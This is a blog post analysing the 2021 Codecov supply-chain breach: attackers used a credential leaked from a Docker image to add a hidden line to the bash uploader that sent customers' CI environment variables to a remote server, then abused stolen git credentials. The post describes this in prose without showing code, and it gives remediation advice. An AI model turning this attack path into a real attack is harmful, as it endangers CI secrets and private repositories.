TL;DR

This breach was done by very sophisticated attackers who exploited a mistake in how Codecov built Docker images. They used this to modify a script that allowed them to send the environment variables from the CI of Codecov customers to a remote server. While the attackers could have conducted multiple attacks from there, we can see based on other disclosures that one path they did take was accessing private git repositories from the git credentials in the CI environment, then exploiting secrets and data within. This shows the importance of keeping your git repositories clean and ensuring we don’t use production credentials in our CI environment where possible.

What is Codecov?

Codecov is a code coverage tool, essentially that means they check to see how much of your application is being tested. When we're building modern applications and we're using continuous integration (CI) and continuous deployment (CD) we want to make sure that we have automated tests in place so when we release a new feature, we can be confident that it works as intended and that it hasn't unintentionally broken any features within the application.

Codecov example
Image from Codecov

Now obviously we want to be able to test every line of code during this process, every function and every feature,  but this requires quite mature testing automation and Codecov can help develop that because it lets you know what lines of code aren't being tested in your CI environment.

What happened - quick timeline of events

On January 31st 2021 malicious actors were able to update the bash uploader script in Codecov, they did this by leveraging credentials they were able to export from a docker image (more on this later).

Between January 31st and April 1st the attackers were able to squat inside Codecov and extract all of the environment variables of Codecov's customers

On April 1st it was actually one of Codecov's customers that noticed that the bash uploader had a different hash value to what was published on their website indicating that something was wrong.

Codecov investigated and were able to fix the issue on April 15th after some thorough investigations, Codecov then announced that they had been breached to the public and notified their customers.
Source: https://about.codecov.io/security-update/

So what does this all mean and how does it affect Codecov users and why is this type of attack a concerning trend for other CI tools?

Why is this type of attack significant?

This type of attack is called a supply chain attack, this is because Codecov sits in your software supply line. And just like a supply chain in the physical world, each part of the chain deals with lots of different goods from multiple different customers. When attackers penetrate a chain in the supply line, they can breach multiple organizations.

Example software supply chain
Example software supply chain

Using the example above of an oversimplified modern software supply chain we can follow the different stages of a typical supply chain.

  1. We create or modify our code
  2. Commit and push this code into our repositories
  3. New code goes to CI environment
    a. The applications is compiled
    b. We run tests on the application
    c. We produce reports on how our app performs
  4. Code moves to CD pipeline
    a. Final changes reviewed
    b. Staging application deployed
    c. Production application deployed

Let's focus on the CI environment. We can do a lot of powerful automation in this stage to test our application. But how we build applications has changed and we now rely on multiple external services: Databases, Payment systems, Cloud infrastructure……. All these components need to be accessed by the tools within the CI environment so they can build and test the application. For this reason, the CI environment needs to have access to the secrets or credentials that grant access to these systems. Hopefully, if we build a secure CI environment we are using staging infrastructure which is less critical. But it is still very common for production credentials to be used and most importantly, it is highly likely that the CI environment will have access to the git repository, which is known to contain a trove of sensitive information.

So by attacking Codecov the attackers now have access to all the credentials within the CI environment for ALL Codecov customers.

How the attackers breached Codecov

Now we understand why a supply chain attack can be highly impactful, let's discuss the steps how the attackers were able to breach Codecov.

The attackers exploited an error in how Codecov created their docker images. This process actually allowed the attackers to extract a credential from the Docker image, this credential allowed them to be able to modify their Bash uploader script. A bash script is just a set of instructions similar to what you would write within your bash or terminal, but written out in a programmatic way. They added a single line of code to this bash, which was an additional step to send all the environment variables from the CI to an attacker's remote server. Essentially taking the sensitive information that makes your application run, and giving it to the bad guy. This single line of code was, if I can say so, beautifully executed and hidden on line 525 of a 1800+ line document. Without knowing it’s there it would be extremely difficult to find.

Codecov bash uploader malicious code
Extract code from bash uploader

View the entire compromised bash uploader script

Who was affected by this?

Codecov has 23 000 customers/users, anyone that was using the compromised version of Codecov between January 31st and April 1st would have been affected. Large organizations such as  Twilio, Hashicorp, Rapid7, Confluent  have released their own statements about how this has affected them.  

What did the attackers do?

Because there are so many potential victims, we cannot be sure on all the ways the attackers leveraged the sensitive information they stole. However from the public disclosures we can get an idea. A good example is Twilio.

On April 22, 7 days after public announcement of the breach, GitHub had noticed suspicious activity relating to the Codecov breach and private repositories had been cloned with some Twilio user tokens exposed within these repositories.

While this example is very small in the scale of the breach, it clearly shows one attack path the attackers took.

  1. Compromise Codecov
  2. Use stolen git credentials from bash uploader
  3. Access private repositories using stolen git credentials
  4. Scan repositories for sensitive information and secrets
  5. Exploit secrets
Codecov attack path
Codecov attack path

This clearly shows that private git repositories were a clear target by the attackers.

What should you do if you have been affected?

If you were using Codecov between January 31st and April 1st then it's very important that you take action now.

Revoke secrets

The first thing that you should do is rotate all your credentials, this means all the credentials your CI environment has access to, even if they are not used in production environments as these can still be used to move laterally. But it also means to revoke access to any credentials that were stored with git repositories or other remote data stores that the CI environment had access to.

Check logs

The next thing is we want to analyze our logs to make sure that we can see any suspicious activity, this will give an indication whether or not the attackers have penetrated into your systems.

Scan code repositories and Docker images

You should now agree that it is very important to ensure our git systems are clean and free of sensitive information. These can be hidden deep in the commit history of a project, making them very difficult to find. This is why it is crucial to use automated detection to do this.

Secrets can also hide in Docker images.

GitGuardian provides a free tier of its code security platform, which will quickly uncover any secrets.

Add two-way authentication for machines

The final step you may choose to take is adding two-way authentication for machines accessing secrets. This means you can grant access to your systems within your CI environment while adding another encryption and authentication step so attackers cannot use these even if they get exposed. This is a significant step, and fantastic products like Hashicorp Vault exist that can do this. Bear in mind these are often very complicated tools that are costly and complicated to install (even if the underlying tool is open-source). But this will ensure that in the event of an attack like this, you are covered.

Is Codecov safe?

This is an uncomfortable question often, but I will provide my thoughts on this.

Firstly it is impossible to reduce the risk of the breach to 0. New vulnerabilities and exploits are discovered every day so there is always a risk that tools within your supply chain will be compromised. The attack on Codecov was clearly conducted by sophisticated attackers and while they were able to exploit a mistake, it was not a trivial exploit.

The other consideration is communication, Codecov were very upfront about the breach and have continued to provide new information. This is a good indication.

While I believe we need to be critical of tools we introduce into our supply chain, we can be certain Codecov have fixed the underlying problem and would have conducted a serious security audit following the breach.

The final comment on this falls back to the customers of Codecov. Of course we expect our vendors to take security measures seriously, but we also need to take responsibility for our own security. This means making sure we don’t use production credentials in our CI environment, ensuring our git repositories are clean and having response plans in place. If we can do this then we can

That's it!

Hopefully you found this article useful in understanding how this attack was conducted and If you have any questions, comments or want to request a breach review, reach out on Twitter to me at @advocatemack or use the hashtag #askmack.

If you are interested in other 2022 data breaches and attacks, you can find a detailed analysis of the Uber breach and of the Toyota data breach.